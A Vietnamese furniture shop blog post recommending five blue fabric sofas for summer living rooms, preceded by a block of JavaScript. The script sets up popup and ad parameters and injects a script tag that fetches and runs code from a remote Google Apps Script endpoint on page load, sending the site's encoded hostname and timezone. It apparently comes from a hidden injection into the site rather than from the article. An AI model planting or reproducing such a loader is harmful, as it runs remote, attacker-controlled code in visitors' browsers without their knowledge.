var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

5 bộ sofa phòng khách mùa hè bằng vải màu xanh mát

Muốn chọn sofa phòng khách mùa hè thì không thể bỏ qua dòng sofa bằng vải với gam màu xanh tươi mát. Gam màu xanh luôn tạo năng lượng tràn đầy cùng cảm giác cực thoải mái.

Sofa phòng khách dành cho mùa hè có nhiều màu sắc, trong đó gam màu xanh luôn được yêu thích nhất.

Lí do nên mua sofa phòng khách mùa hè bằng vải màu xanh

Chất liệu sofa vải khi bạn chọn cho mùa hè chỉ bí bách khi bạn mua phải chất liệu kém, không thông thoáng và không thấm hút mồ hôi. Nếu bạn mua sofa vải tại địa chỉ uy tín thì không cần phải lo lắng về các vấn đề trên. Sofa thông thoáng, mềm mại và không gây khó chịu cho người dùng. Đặc biệt nếu bộ sofa đó có gam màu xanh thì lại càng tạo cảm giác dễ chịu hơn nữa.

Gam màu xanh mang lại cho căn phòng của bạn cảm giác rộng rãi hơn, thoáng đãng hơn và tạo nên một tinh thần rất dễ chịu, sảng khoái. Bạn có thể dùng kết hợp với tấm thảm sofa cùng màu xanh hay các màu nhẹ nhàng để xua tan đi cái nóng nực của mùa hè.

5 bộ sofa phòng khách mùa hè bằng vải màu xanh mát

Nếu như bạn đang có nhu cầu chọn mua sofa phòng khách màu xanh chất liệu vải cho không gian hãy tham khảo ngay 5 mẫu sau đây:

sofa phòng khách mùa hè
Bộ sofa phòng khách mùa hè cao cấp, kích thước lớn rất hợp cho các không gian rộng

sofa phòng khách mùa hè

Bộ sofa màu xanh da trời cực tươi sáng, mát mẻ và sang trọng, trẻ trung cho mùa hè

sofa phòng khách mùa hè

Sofa màu xanh dương đậm rất nổi bật nhưng không hề tạo nên sự bí bách

sofa phòng khách mùa hè

Sofa vải chân gỗ màu xanh mát dịu. Ghế sofa có kích thước lớn rất phù hợp với các không gian rộng

sofa phòng khách mùa hè

Bộ sofa phòng khách mùa hè màu xanh nhỏ gọn cực kì dễ bài trí trong không gian nhỏ

Sofa phòng khách cao cấp chất liệu vải nỉ bền đẹp với thời gian, là sự chọn lựa cho mọi khách hàng. Mua thêm tại Nội Thất Xinh các món đồ như bàn ăn mặt đá hiện đại hay bàn kệ, các loại ghế sofa cao cấp khác nhau để có được không gian đẹp nhất và yên tâm về chất lượng.